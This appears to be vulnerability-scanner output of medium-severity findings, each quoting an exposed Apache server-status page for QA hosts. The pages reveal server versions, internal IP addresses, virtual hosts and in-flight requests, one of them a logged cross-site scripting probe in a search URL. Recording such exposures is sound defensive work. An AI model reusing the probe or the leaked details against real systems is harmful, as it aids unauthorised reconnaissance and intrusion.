/etc/designs/fishersci/clientlibs/headlibs.min.2020.1.0.js 28-0160590/0/782_ 0.00840791160.00.009.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0102500/1/808_ 0.0020611841120.00.0012.18 10.253.106.168http/1.1 30-0230625/43/841K 0.12217111157518.80.4220.74 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0230630/26/842_ 0.062003326660.00.0578.05 10.253.106.168http/1.1 32-0105992/6/862K 0.01102075413.30.1818.81 10.253.106.191http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 33-042660/152/1013R 0.573946431534820.02.3318.81 10.253.106.168http/1.1 34-0160940/0/766_ 0.005403403660.00.0025.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0160960/0/801_ 0.00500946580.00.0019.29 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0102820/69/764R 0.33771121390230.00.748.37 10.253.106.168http/1.1 37-029440/72/925R 0.26463131337570.00.5632.28 10.253.106.191http/1.1 38-0161100/0/756_ 0.00330850720.00.00152.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0112563/25/695K 0.07128121256246.90.0914.28 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-069190/55/583_ 0.143692061470290.00.2017.72 10.253.106.191http/1.1 41-0102840/53/929R 0.3554710904080.00.6327.09 10.253.106.191http/1.1 42-064170/130/991_ 0.59216122374330.02.0235.06 10.253.106.191http/1.1 43-029470/68/693R 0.32673131754810.01.0616.92 10.253.106.168http/1.1 44-089186/140/534W 0.48009380863.76.6911.00 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 45-0230650/93/691R 0.36696123086390.00.9711.24 10.253.106.168http/1.1 46-0114570/9/819R 0.017068945580.00.0261.94 10.253.106.168http/1.1 47-0161230/0/856_ 0.002201007140.00.0012.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-079660/192/474R 0.5361411586230.01.46115.16 10.253.106.191http/1.1 49-0114590/4/603_ 0.01357171388920.00.016.25 10.253.106.168http/1.1 50-0102880/29/732R 0.17768212137830.00.2215.98 10.253.106.168http/1.1 51-0161270/0/727_ 0.00101589910.00.0015.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-029500/62/761R 0.17706113026410.00.4415.46 10.253.106.191http/1.1 53-070100/62/749_ 0.24357101776810.00.4536.04 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 54-029520/71/629_ 0.16
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c463c92bf
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 22-Jun-2024 19:43:43 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 9 hours 40 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 50007 - Total Traffic: 1.6 GB - Total Duration: 6791558 CPU Usage: u13.29 s28.03 cu73.9 cs41.27 - .129% CPU load .413 requests/sec - 14.1 kB/second - 34.3 kB/request - 135.812 ms/request 34 requests currently being processed, 30 idle workers ___K_K________K__R_R____.._.._R.K..._..__.R.....R..RR._.RK.R__.. _KR_.._R..R..R...R..R.R.KR..RRKRRR..WRRR........................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0208050/193/497_ 0.8024912867560.04.5870.39 10.253.106.168http/1.1 1-079710/46/432_ 0.132490660300.00.3211.11 10.253.106.168http/1.1 2-0138590/124/359_ 0.3379141940570.05.0912.33 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-02243512122/12122/12122K 11.07911077422085.921.5721.57 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0174020/52/249_ 0.1324941641560.00.3414.34 10.253.106.168http/1.1 5-02243712122/12122/12122K 11.40601037722088.021.5721.57 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0139890/0/461_ 0.00510756280.00.0038.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0139900/0/328_ 0.00430594360.00.008.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0240590/6/219_ 0.032496352310.00.1418.13 10.253.106.168http/1.1 9-0286710/104/320_ 0.2924912541970.01.096.74 10.253.106.168http/1.1 10-0139950/0/291_ 0.003902087290.00.006.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0240600/20/313_ 0.0424981783630.00.1312.79 10.253.106.168http/1.1 12-0240610/3/379_ 0.0024902121450.00.0212.42 10.253.106.168http/1.1 13-0139960/0/555_ 0.003601389300.00.0016.45 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-01485110/114/432K 0.302601120821220.25.0939.76 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-0183630/70/287_ 0.2324912446350.00.507.38 10.253.106.168http/1.1 16-0139970/0/410_ 0.00350647340.00.0021.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-082400/45/346R 0.19519152238280.00.339.61 10.253.106.191http/1.1 18-0139980/0/362_ 0.00350603250.00.007.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0138640/113/523R 0.49485431148030.00.91163.89 10.253.106.168http/1.1 20-0138650/52/331_ 0.1324995356130.01.735.46 10.253.106.168http/1.1 21-0140140/0/425_ 0.002502075840.00.0028.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0264040/118/435_ 0.3424913891570.01.5297.80 10.253.106.168http/1.1 23-0140160/0/362_ 0.0060644190.00.009.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0-0/0/438. 0.008230767680.00.00166.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0-0/0/363. 0.0023201917830.00.0010.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0280980/106/237_ 0.302493601652420.00.614.43 10.253.106.168http/1.1 27-0-0/0/246. 0.0022702552000.00.0010.13 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0-0/0/325. 0.005510437490.00.006.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0281010/100/319_ 0.2624912533840.00.777.00 10.253.106.168http/1.1 30-0207090/74/349R 0.2255413465690.00.2814.19 10.253.106.168http/1.1 31-0-0/0/377. 0.0024501794640.00.0073.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0148526/151/416K 0.50300094136194.25.8111.42 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/dam/diagnostics/hcp/documents/Soy%20Exposure%20Red 33-0-0/0/496. 0.002350534250.00.008.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0-0/0/324. 0.007980332230.00.0017.94 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0-0/0/433. 0.005500676150.00.0012.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0149740/79/330_ 0.2215011334140.00.385.05 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 37-0-0/0/371. 0.005170845440.00.0010.08 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0-0/0/391. 0.002280573430.00.00147.70 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0149750/55/286_ 0.1816113394910.00.319.08 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0207110/29/266_ 0.0719914664900.00.2112.82 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0-0/0/376. 0.002240438920.00.0020.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0150090/75/402R 0.214992711849880.00.4918.52 10.253.106.191http/1.1 43-0-0/0/352. 0.002400862210.00.007.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/250. 0.002360483820.00.002.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0-0/0/297. 0.002260329930.00.006.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0-0/0/401. 0.002330477190.00.0025.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/417. 0.003670537640.00.006.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-087720/21/216R 0.1453015395980.00.38113.13 10.253.106.191http/1.1 49-0-0/0/347. 0.0023001182330.00.004.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0-0/0/304. 0.0052801776930.00.0012.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0151390/65/288R 0.165546401120.00.169.16 10.253.106.191http/1.1 52-0281100/147/429R 0.50554222060890.00.748.85 10.253.106.191http/1.1 53-0-0/0/309. 0.00239
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c8c2e72cf
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Jun-2024 20:13:52 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 7 hours 34 minutes 54 seconds Server load: 0.00 0.01 0.00 Total accesses: 682209 - Total Traffic: 10.5 GB - Total Duration: 74031653 CPU Usage: u53.87 s121.17 cu1166.74 cs753.6 - .331% CPU load 1.08 requests/sec - 17.5 kB/second - 16.2 kB/request - 108.518 ms/request 36 requests currently being processed, 33 idle workers KRR__R_R__RRKKRKK__R_R____R__K_K_RKKRRR_____RRKKR____.RK_._RR._R _RW........_._.R...._.................................._........ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175963210/63210/63210K 58.775053666116063.2113.34113.34 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-039470/8/6658R 0.033906397378830.00.24127.70 10.253.106.168http/1.1 2-050540/10/7444R 0.03441012274580.04.53118.22 10.253.106.191http/1.1 3-0297260/114/6960_ 0.40111011857580.01.43175.65 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/phadia/international/zh-wo/software-an 4-0115390/0/7479_ 0.0014807344420.00.00190.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-083230/9/5800R 0.015201110265560.01.6194.46 10.253.106.191http/1.1 6-0115400/0/7388_ 0.0014709174030.00.00135.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-072730/1/6679R 0.0054208746090.00.00106.11 10.253.106.191http/1.1 8-087870/4/7110_ 0.1129108693640.00.37148.57 10.253.106.191http/1.1 9-0115410/0/6891_ 0.0014708079300.00.00108.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-088670/0/7349R 0.00629012245540.00.00146.69 10.253.106.168http/1.1 11-0301660/54/6445R 0.14390127163480.01.45168.94 10.253.106.168http/1.1 12-088688/8/6178K 0.0122529791430178.10.17190.02 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 13-072301/228/6892K 0.9825699469381.26.99137.12 10.253.106.191http/1.1www-qa.patheon.cn:80OPTIONS / HTTP/1.1 14-0301670/55/8083R 0.2039108132060.01.29162.07 10.253.106.191http/1.1 15-034381/88/7194K 0.2611246680428720.38.10158.20 10.253.106.191http/1.1www-qa.patheon.kr:80GET /innovative-solutions/integrated-offerings HTTP/1.1 16-0728324/30/6400K 0.171111227605253.70.2893.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server HTTP/1.1 17-0301690/133/6373_ 0.552214314073540.04.42102.64 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 18-0115680/0/7454_ 0.009509211190.00.00133.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-072840/1/7167R 0.0054208432640.00.00173.63 10.253.106.191http/1.1 20-0249890/65/6950_ 0.366909485230.02.00111.69 10.253.106.168http/1.1 21-088690/6/7037R 0.01521317901250.00.10101.93 10.253.106.168http/1.1 22-0302300/104/7147_ 0.61601110808530.09.55117.61 10.253.106.168http/1.1 23-048720/7/5703_ 0.006906585590.00.1085.58 10.253.106.168http/1.1 24-0115690/0/6347_ 0.0094010099110.00.00100.47 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0303030/92/5965_ 0.28186138214380.02.54159.02 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-043530/35/5834R 0.19390167004100.01.14163.32 10.253.106.168http/1.1 27-0277420/162/6595_ 0.6185138397800.03.61142.46 10.253.106.168http/1.1 28-0115700/0/6237_ 0.009408373090.00.00142.70 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-074265/17/7005K 0.1021073244863.00.20148.76 10.253.106.191http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 30-0115710/0/6019_ 0.0093010349720.00.00107.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0279239/100/6043K 0.309510914519197.90.7387.03 10.253.106.191http/1.1qa1-corporate.thermofisher.com:OPTIONS /us/en/index.html HTTP/1.1 32-0324130/33/6304_ 0.0969198243400.00.81103.03 10.253.106.191http/1.1 33-088700/0/6455R 0.0060309146550.00.00118.11 10.253.106.168http/1.1 34-0179563209/63209/63209K 62.047060367116061.5113.34113.34 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0312171/127/6527K 0.4527877397610.77.4693.52 10.253.106.168http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 36-0312180/38/7396R 0.155158919499960.01.69131.29 10.253.106.191http/1.1 37-088710/0/6766R 0.0060308678060.00.00150.01 10.253.106.168http/1.1 38-051520/10/6109R 0.04390266384210.00.1691.84 10.253.106.168http/1.1 39-0115720/0/6639_ 0.0093010063220.00.00137.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-043540/54/6296_ 0.29276012087300.01.99184.15 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/europe/it-it/allergy-types/foo 41-0324140/19/5227_ 0.051136411470.03.5678.94 10.253.106.168http/1.1 42-043550/13/6085_ 0.02693811246600.00.10162.12 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /?1718920773 HTTP/1.1 43-051540/29/6228_ 0.11124129412110.00.81132.67 10.253.106.191http/1.1 44-0279310/133/6241R 0.4139007406420.03.1676.41 10.253.106.168http/1.1 45-04390/88/5620R 0.4431228174080.01.82175.15 10.253.106.168http/1.1 46-06052/71/5347K 0.30148157476164.50.78105.29 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 47-050559/30/5765K 0.191722981492168.60.4493.41 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 48-074280/11/5792R 0.03390166922880.00.20105.65 10.253.106.168http/1.1 49-0115730/0/5635_ 0.009306437200.00.00102.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-078750/5/5308_ 0.0021506499990.00.00127.27 10.253.106.191http/1.1 51-06070/51/4892_ 0.2517126652220.00.5085.49 10.253.106.168http/1.1 52-0115740/0/5165_ 0.009307916200.00.0080.81 127.0.0.1http/1.1qa1.allergyinsider.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cd0058d31
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 18-Jun-2024 06:58:29 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 4 days 18 hours 19 minutes 32 seconds Server load: 0.22 0.51 0.30 Total accesses: 495138 - Total Traffic: 7.1 GB - Total Duration: 52520920 CPU Usage: u43.91 s82.38 cu839.09 cs552.71 - .369% CPU load 1.2 requests/sec - 18.0 kB/second - 15.0 kB/request - 106.073 ms/request 47 requests currently being processed, 39 idle workers KR.R__._RR._RK_RRRRR_.RR.__RR____.K.RRR_.__.RR.._R._.RR.__R...RK R._R...KR.._._.___R_R_.______R.K__R._.....R.RR.._R.RR_...RW_..RK ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175941158/41158/41158K 38.34203502175489.873.7273.72 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-0319300/93/4821R 0.243165497500.00.83105.60 10.253.106.191http/1.1 2-0-0/0/5769. 0.007609475010.00.0076.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0293450/64/5044R 0.2178149353350.03.48144.60 10.253.106.168http/1.1 4-053390/39/5288_ 0.15004746020.00.59129.79 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 5-049570/25/3974_ 0.070166391320.00.3467.26 10.253.106.191http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 6-0-0/0/5826. 0.007205122300.00.0079.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-064970/23/5056_ 0.060166657090.00.1677.13 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 8-0323500/594/5312R 2.7578176379130.07.9989.16 10.253.106.191http/1.1 9-056490/27/5457R 0.0878136333790.00.3880.82 10.253.106.191http/1.1 10-0-0/0/5594. 0.00191010119430.00.00115.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-053400/33/4691_ 0.07095029980.00.25115.65 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 12-023230/31/4201R 0.1278185344870.00.46114.36 10.253.106.168http/1.1 13-056511/2/5014K 0.0029914766546212.30.0290.70 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.css?v= HTT 14-0194040/21/6240_ 0.040165629550.00.1577.74 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 15-024750/24/5248R 0.0878146038580.00.22119.69 10.253.106.168http/1.1 16-053410/7/4668R 0.02781310073920.00.0472.42 10.253.106.168http/1.1 17-019880/64/5042R 0.311179569350.01.4469.36 10.253.106.168http/1.1 18-0194050/62/5408R 0.14236146758660.00.4572.98 10.253.106.168http/1.1 19-019890/23/5270R 0.049176140880.00.14119.97 10.253.106.191http/1.1 20-064980/25/5031_ 0.060146208260.00.1959.53 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 21-0-0/0/5467. 0.003206154690.00.0078.13 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-056650/56/5161R 0.1277157011790.00.4385.73 10.253.106.168http/1.1 23-053420/29/4405R 0.071184723500.00.2266.41 10.253.106.168http/1.1 24-0-0/0/4720. 0.0031708299520.00.0074.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-027540/44/4337_ 0.20066003970.01.77117.18 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 26-066700/23/4396_ 0.050205144040.00.18124.62 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 27-010270/78/4688R 0.24199206455040.01.12111.53 10.253.106.191http/1.1 28-0257100/168/4750R 0.531155445560.01.75115.98 10.253.106.191http/1.1 29-0194060/21/5457_ 0.050175362630.00.1781.42 10.253.106.191http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 30-0194070/22/4530_ 0.050186507860.00.1651.42 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 31-056670/38/4282_ 0.120126484220.00.4657.27 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 32-053440/30/4691_ 0.121176648880.00.3273.21 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 33-0-0/0/4714. 0.0030006301360.00.0080.53 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0179541157/41157/41157K 40.52503938175488.273.7273.72 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0-0/0/4960. 0.007304782900.00.0056.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0260530/55/5799R 0.2850147737610.03.4679.26 10.253.106.168http/1.1 37-056680/88/5537R 0.2177156411590.00.65122.82 10.253.106.168http/1.1 38-0257110/194/4574R 0.6481154460690.04.8162.23 10.253.106.168http/1.1 39-0194080/10/4821_ 0.01107475600.00.0571.59 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /onelambda/wo/en/search.html?search=javascript%3Aalert(81)% 40-0-0/0/4423. 0.0010207605640.00.00133.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0194090/21/3706_ 0.051144222220.00.1754.62 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 42-0194100/16/4288_ 0.03108263210.00.1350.21 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 43-0-0/0/4720. 0.0036707575440.00.0098.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0194130/123/4590R 0.2978155055800.00.9255.04 10.253.106.168http/1.1 45-0194140/124/3762R 0.2878146189260.00.9192.86 10.253.106.191http/1.1 46-0-0/0/3659. 0.0019004839860.00.0055.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/4594. 0.0027408291300.00.0064.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-049600/30/4118_ 0.120104601210.00.2967.42 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /onelambda/wo/en/companion-diagnostic-HLA-biomarkers.html 49-0194170/111/3963R 0.3078153950350.00.8877.26 10.253.106.191http/1.1 50-0-0/0/3792. 0.0017804206620.00.0091.85 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cbbcceecb
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 16-Jun-2024 03:43:08 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 4 minutes 10 seconds Server load: 0.00 0.02 0.00 Total accesses: 333681 - Total Traffic: 4.5 GB - Total Duration: 34005130 CPU Usage: u23.56 s45.66 cu553.8 cs378.81 - .441% CPU load 1.47 requests/sec - 20.8 kB/second - 14.2 kB/request - 101.909 ms/request 36 requests currently being processed, 27 idle workers KR____R._RKR_..KRR_R.KR_K_RRKR___KK._RK__RRR_RR_.__RR.RKWK_.._R. ..R.__...K____....................R............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175922706/22706/22706K 21.29101947241601.540.6340.63 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-0113860/41/3158R 0.09541113154840.00.8874.35 10.253.106.191http/1.1 2-0316910/0/3921_ 0.007106942040.00.0057.91 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-0113870/18/3314_ 0.06119117182400.00.09104.40 10.253.106.168http/1.1 4-0317250/0/3705_ 0.00003183700.00.0088.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-03210/69/2709_ 0.34257105046290.00.7644.51 10.253.106.191http/1.1 6-0304940/8/4325R 0.01544113367290.00.0846.91 10.253.106.191http/1.1 7-0-0/0/3920. 0.0025605584110.00.0054.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0305780/4/4019_ 0.01119115074880.00.0166.31 10.253.106.168http/1.1 9-054360/53/3588R 0.57543123770740.01.5460.28 10.253.106.168http/1.1 10-087201/22/3754K 0.06110335085572.10.2252.72 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 11-0143930/242/3184R 0.82317202974230.06.9672.94 10.253.106.168http/1.1 12-0115760/27/3036_ 0.07131524112160.00.2365.49 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 13-0-0/0/3505. 0.0025404411080.00.0073.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0-0/0/4758. 0.0025504266330.00.0048.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0157953/11/3765K 0.071531235916826.80.1561.81 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-0312990/1/3239R 0.00544135044460.00.0045.83 10.253.106.168http/1.1 17-0117530/279/3422R 1.3254507138940.04.2244.58 10.253.106.191http/1.1 18-0115780/8/3519_ 0.0131114035980.00.0439.14 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-054560/53/3900R 0.28542124158540.00.7764.77 10.253.106.168http/1.1 20-0-0/0/3562. 0.0024003969800.00.0044.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0105504/45/3927K 0.121281242868219.40.4241.00 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0145140/133/3298R 0.37543124333810.00.6946.73 10.253.106.191http/1.1 23-0105510/22/2952_ 0.0611812660250.00.0945.50 10.253.106.191http/1.1qa1.allergyinsider.com:80GET 